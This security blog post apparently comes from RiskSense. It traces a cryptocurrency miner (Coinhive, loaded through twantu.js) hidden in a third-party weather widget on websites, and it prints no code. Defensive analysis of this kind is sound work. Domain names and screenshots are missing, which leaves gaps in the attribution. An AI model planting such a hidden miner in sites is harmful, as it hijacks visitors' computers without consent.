contact us

What’s Hiding in Your Website’s Third-Party Widgets?

by Dec 28, 2017

What’s Hiding in Your Website’s Third-Party Widgets?

If you visit, you may notice one of two things. Either the fans in your computer will start to spin very fast and make a lot of noise or your antivirus will (hopefully) pop a friendly alert that something malicious is going on with your browser. Why? Because unsuspecting visitors to this site are being exposed to a *drum roll* cryptocurrency miner!

Now, isn’t a fake company, and the webmaster isn’t a malicious actor. So, how is this possible? Was defaced? Actually, the problem lies in a small weather widget that’s available on the site.

Firing up Burp Suite, we can see the requests being made through our proxy. The most recent request is made to a subdomain on, which is a glaring problem since I don’t remember opting in to use the service. We can look at the previous request to get some insight on where this is coming from.

The weather widget makes a call back to for local weather information but also sources an interesting JavaScript file, twantu.js, and runs the command RunAd(). Let’s look at some source code!

Ah, well, of course it’s minified, because the last thing you want is for your cryptocurrency mining boot script to take up more space than necessary.

Much better. Clearly we see that twantu.js sources a JavaScript file from Coinhive and starts a miner using the referrer and a randomly generated key.

Obviously, the fault of is that they are using an untrusted weather plugin, but is a legitimate service that was breached or is it the malicious actor? The twantu.js file is being hosted on under /static/js/twantu.js, so it’s possible that an attacker managed to gain access to the file system and uploaded this file along with modifying the weather widget to source twantu.js. The problem with this, however, is that the referrer and random key aren’t being generated by JavaScript, they’re being created by Express. A malicious actor would need to first have access to the application framework, which means having control over the web server.

A quick WHOIS for

Aaand a quick Google search:

Handsome looking guy! Unfortunately, I doubt Mr. Hassan created a weather widget that mines cryptocurrency. ¯\_(ツ)_/¯

The next question is, “How many sites are using this widget?” Well, this is where things get tricky. We can’t Google Dork our way into finding which sites are using this because it’s in the HTML. Using services like and, we can tell there are about 300 websites that are using this widget, but we can’t confirm most of these because they’re hidden behind a paywall.

What do we take from this? Don’t install or use untrusted third-party widgets or applications. Simple as that. Also, if you’re using the weather widget from, then maybe it’s time to find a new one.

RiskSense Logo
RiskSense®, Inc. provides vulnerability management and remediation prioritization to measure and control cybersecurity risk. The cloud-based RiskSense platform delivers Risk-Based Vulnerability Management, Application Security Orchestration and Correlation, in addition to our Vulnerability Knowledge Base.These products bring insight to the wide views of vulnerability risk with adversarial threat-context and ties to ransomware. With Vulnerability Risk Rating, threat analytics, and automated playbooks prioritize actions for critical security weaknesses dramatically improving security and IT efficiency and effectiveness of managing attack surface risk.

Contact us at

+1 505-217-9422

Follow Risksense on LinkedIn Follow Risksense on Twitter

© 2021 RiskSense, Inc. All rights reserved.
Legal Notices, Privacy Policy, and Customer Agreements | Site Map